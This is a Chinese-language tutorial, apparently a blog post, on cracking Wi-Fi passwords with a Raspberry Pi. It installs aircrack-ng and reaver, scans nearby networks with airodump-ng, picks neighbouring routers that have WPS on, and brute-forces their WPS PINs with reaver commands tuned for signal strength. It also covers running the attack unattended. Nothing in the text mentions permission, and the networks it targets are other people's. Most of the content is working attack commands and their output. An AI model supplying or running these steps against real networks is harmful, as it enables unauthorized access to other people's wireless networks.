硬件环境
树莓派Raspberry2一个(我用的是debian环境)
PC一台(或其它设备直接操作PI就行)
无线网卡(能用就行,不过强大的无线网卡会事半功倍,我用的AR9271)
安装依赖包
sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion ethtool
sudo apt-get install -y libnl-3-200 libnl-3-dev libnl-genl-3-dev libnl-genl-3-200
安装aircarck-ng
svn co http:
//svn
.aircrack-ng.org
/trunk/
aircrack-ng
cd
aircrack-ng/
make
sudo
make
install
安装reaver
wget http:
//reaver-wps
.googlecode.com
/files/reaver-1
.4.
tar
.gz
tar
zxvf reaver-1.4.
tar
.gz
cd
reaver-1.4
/src
.
/configure
make
sudo
make
install
如果上面下载的地址被墙,试下"http://pan.baidu.com/s/1kUdvM1D"
如果安装成功后,会有airmon-ng,airodump-ng,reaver等命令可用。
破解教程
pi@raspberrypi:~ $ sudo airmon-ng start wlan0
Your kernel supports rfkill but you don't have rfkill installed.
To ensure devices are unblocked you must install rfkill.
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
PID Name
399 wpa_supplicant
464 avahi-daemon
477 dhcpcd
490 avahi-daemon
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
pi@raspberrypi:~ $ sudo airodump-ng wlan0mon
CH 9 ][ Elapsed: 6 mins ][ 2016-05-23 17:39
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:00:00:00:00:00 -1 0 3 0 1 -1 WPA
00:00:00:00:00:00 -52 415 31 0 11 54e WPA2 CCMP PSK RaspberryPi
00:00:00:00:00:00 -64 359 14 0 6 54e. WPA2 CCMP PSK 123?.?头人
00:00:00:00:00:00 -69 163 0 0 13 54e WPA2 CCMP PSK FAST_6F9A
00:00:00:00:00:00 -63 179 67 4 13 54e WPA2 CCMP PSK FAST_zz
00:00:00:00:00:00 -71 161 11 0 1 54e. WPA2 CCMP PSK yan.123
00:00:00:00:00:00 -71 33 2 0 12 54e WPA2 CCMP PSK FAST_060E
00:00:00:00:00:00 -77 186 0 0 1 54e. WPA2 CCMP PSK TPGuest_5572
根据上面的airodump搜索到的无线信号,然后可以挑信号强的进行破解(注意,要选择开了WPS功能的)
注意看这张列表,列表中显示了你周边无线的相关信息。注意看
MB 这一列,显示为” 54 “、”54e. “等等,这表示了无线当前的速率模式以及WPS开启状况,我自己的路由器是 “steve”,注意看,”54e“和”
54e. “是不同的,多了一个 点,这个点表示开启了
wps模式。所以我们下面就进行wps的探测,在这里我们要记住SSID对应的MAC地址,此后我们会针对MAC地址进行攻击和探测。
sudo reaver -i wlan0mon -b 00:00:00:00:00:00 -a -S -vv -d 10 -t 9 -c 11
-vv 是查看详细信息的,等你熟练了之后,你就可以使用 -v ,这样就简单了。通常,遇到问题才会使用 -vv
。
如果想挂机破解,记得加上nohup命令后,可以断开ssh。然后剩下就是等待。
nohup sudo reaver -i wlan0mon -b 00:00:00:00:00:00 -a -S -vv -d 10 -t 9 -c 11 -o fbi &
-o
参数是输出到文件
如果破解成功后,打开输出的日志,就可以看到reaver出来的密码。
reaver:
-i 监听后接口名称 -b 目标mac地址 -a 自动检测目标AP最佳配置 -S 使用最小的DH key(可以提高PJ速度) -vv 显示更多的非严重警告 -d 即delay每穷举一次的闲置时间 预设为1秒 -t 即timeout每次穷举等待反馈的最长时间 -c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死 示例: reaver -i wlan0mon -b MAC -a -S –d9 –t9 -vv 应因状况调整参数(-c后面都已目标频道为1作为例子) 目标信号非常好: reaver -i wlan0mon -b MAC -a -S -vv -d0 -c 1 目标信号普通: reaver -i wlan0mon -b MAC -a -S -vv -d2 -t 5 -c 1 目标信号一般: reaver -i wlan0mon -b MAC -a -S -vv -d5 -c 1
命令是检查reaver进程是否存在
ps -ef | grep reaver 查看reaver后台进程PID号
杀死对应pid进程
kill -9 pid
注意:本文归作者所有,未经作者允许,不得转载